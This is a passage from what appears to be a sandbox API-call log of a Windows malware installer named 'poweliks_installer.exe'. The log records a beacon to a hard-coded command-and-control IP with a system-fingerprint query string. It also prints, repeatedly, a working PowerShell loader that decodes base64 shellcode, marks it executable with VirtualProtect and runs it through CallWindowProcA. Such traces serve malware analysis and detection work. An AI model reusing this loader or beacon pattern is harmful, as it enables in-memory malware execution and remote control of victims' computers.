VirtualFree (lpAddress=0x2d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0014.514] UuidCreateSequential (in: Uuid=0x18fce4 | out: Uuid=0x18fce4) returned 0x0 [0014.516] _snprintf (in: _Dest=0x408f28, _Count=0x103, _Format="%x%x%x%x%x%x" | out: _Dest="c43dc7584a0") returned 11 [0014.516] atoi (_Str="1") returned 1 [0014.516] _vsnprintf (in: string=0x18f9b8, count=0x104, format="start", ap=0x18fbd8 | out: string="start") returned 5 [0014.516] GetVersionExA (in: lpVersionInformation=0x18f6f8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f6f8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0014.516] _snprintf (in: _Dest=0x18fac0, _Count=0x103, _Format="%1d.%1d.%04d_%1d.%1d" | out: _Dest="6.1.7601_1.0") returned 12 [0014.516] GetModuleHandleA (lpModuleName="kernel32") returned 0x765b0000 [0014.516] GetProcAddress (hModule=0x765b0000, lpProcName="IsWow64Process") returned 0x765c195e [0014.516] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f790 | out: Wow64Process=0x18f790) returned 1 [0014.516] _snprintf (in: _Dest=0x18f8b0, _Count=0x103, _Format="type=%s&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s" | out: _Dest="type=start&version=1.0&aid=8&builddate=060414&id=c43dc7584a0&os=6.1.7601_1.0_64") returned 79 [0014.516] GetTickCount () returned 0xc2b2 [0014.517] RtlRandom (in: Seed=0x18f784 | out: Seed=0x18f784) returned 0x25920c78 [0014.517] _alloca_probe () returned 0x401126 [0014.517] _vsnprintf (in: string=0x18b780, count=0x1000, format="http://%s/q", ap=0x18f798 | out: string="http://178.89.159.34/q") returned 22 [0014.517] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18b5f0 | out: lpWSAData=0x18b5f0) returned 0 [0014.521] InternetCrackUrlA (in: lpszUrl="http://178.89.159.34/q", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x18b5b4 | out: lpUrlComponents=0x18b5b4) returned 1 [0014.654] socket (af=2, type=1, protocol=6) returned 0x1a4 [0014.694] gethostbyname (name="178.89.159.34") returned 0x304898*(h_name="178.89.159.34", h_aliases=0x3048a8*=(), h_addrtype=2, h_length=4, h_addr_list=0x3048ac*=([0]="178.89.159.34")) [0014.778] connect (s=0x1a4, name=0x18b5a4*(sa_family=2, sin_port=0x50, sin_addr="178.89.159.34"), namelen=16) returned -1 [0035.825] closesocket (s=0x1a4) returned 0 [0035.825] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0035.825] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fbe0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\poweliks_installer.exe")) returned 0x3c [0035.826] strstr (_Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe", _SubStr=":0") returned 0x0 [0035.826] OpenEventA (dwDesiredAccess=0x1, bInheritHandle=0, lpName="c43dc7584a0") returned 0x0 [0035.826] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x18, TokenHandle=0x18fbc8 | out: TokenHandle=0x18fbc8*=0x1a4) returned 1 [0035.826] GetTokenInformation (in: TokenHandle=0x1a4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fbcc | out: TokenInformation=0x0, ReturnLength=0x18fbcc) returned 0 [0035.826] GetLastError () returned 0x7a [0035.826] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x390000 [0035.828] GetTokenInformation (in: TokenHandle=0x1a4, TokenInformationClass=0x19, TokenInformation=0x390000, TokenInformationLength=0x14, ReturnLength=0x18fbcc | out: TokenInformation=0x390000, ReturnLength=0x18fbcc) returned 1 [0035.828] GetSidSubAuthorityCount (pSid=0x390008*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x390009 [0035.828] GetSidSubAuthority (pSid=0x390008*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x390010 [0035.828] VirtualFree (lpAddress=0x390000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.829] CloseHandle (hObject=0x1a4) returned 1 [0035.829] OleInitialize (pvReserved=0x0) returned 0x0 [0035.900] GetModuleHandleA (lpModuleName="kernel32") returned 0x765b0000 [0035.901] GetProcAddress (hModule=0x765b0000, lpProcName="IsWow64Process") returned 0x765c195e [0035.901] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18eff4 | out: Wow64Process=0x18eff4) returned 1 [0035.901] GetTickCount () returned 0x1160f [0035.901] GetTickCount () returned 0x1160f [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x7dddcbe7 [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x56b177fd [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x567be81a [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x242a3a09 [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x7bd8ce81 [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x74b49ff8 [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x5155fa54 [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x323e04be [0035.901] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x719f24b1 [0035.901] _alloca_probe () returned 0x401aa6 [0035.901] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", lpSrch="{ps_code_var1}") returned 0x0 [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x7112b3f1 [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x48c626fe [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x6ca2763f [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x619dab9e [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x2a1f6232 [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x76d9750b [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x32eac016 [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x62e26657 [0035.903] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x5d3885c0 [0035.903] _alloca_probe () returned 0x401aa6 [0035.903] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", lpSrch="{ps_code_var2}") returned 0x0 [0035.904] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x7f8bdafb [0035.904] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x2188754f [0035.904] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x5974b425 [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x68b3175d [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x1abc2c4b [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x320a1743 [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x2e8b9d4b [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x307cfd67 [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x78b99911 [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x5c37d02a [0035.905] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x1a028a35 [0035.905] _alloca_probe () returned 0x401aa6 [0035.905] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", lpSrch="{ps_code_var3}") returned 0x0 [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x4db405d8 [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x1ec10b9b [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x31f57880 [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x773ce092 [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x5b5506ca [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x27409d94 [0035.906] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x139d2e78 [0035.907] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x494536f5 [0035.907] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x64495118 [0035.907] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x71d22d6e [0035.907] _alloca_probe () returned 0x401aa6 [0035.907] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", lpSrch="{ps_code_var4}") returned 0x0 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x5640fede [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x75932ae1 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x34b639f2 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x68c8aa52 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x3115e3fc [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x47af2515 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x42f831d9 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x66417ccd [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x3973dd20 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x3db8dd44 [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x23eb16da [0035.908] RtlRandom (in: Seed=0x409038 | out: Seed=0x409038) returned 0x1d60f80f [0035.908] _alloca_probe () returned 0x401aa6 [0035.908] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", lpSrch="{ps_code_var5}") returned 0x0 [0035.909] VirtualAlloc (lpAddress=0x0, dwSize=0x3b04, flAllocationType=0x3000, flProtect=0x4) returned 0x390000 [0035.910] strncpy (in: _Dest=0x391004, _Source="060414;8;178.89.159.34,178.89.159.35;1", _Count=0x100 | out: _Dest="060414;8;178.89.159.34,178.89.159.35;1") returned="060414;8;178.89.159.34,178.89.159.35;1" [0035.911] VirtualAlloc (lpAddress=0x0, dwSize=0x4eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0035.912] VirtualAlloc (lpAddress=0x0, dwSize=0x562d, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0035.913] strncpy (in: _Dest=0x3b0000, _Source="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);", _Count=0x562d | out: _Dest="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);") returned="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"{ps_shellcode}\");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);" [0035.914] _alloca_probe () returned 0x401aa6 [0035.914] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return 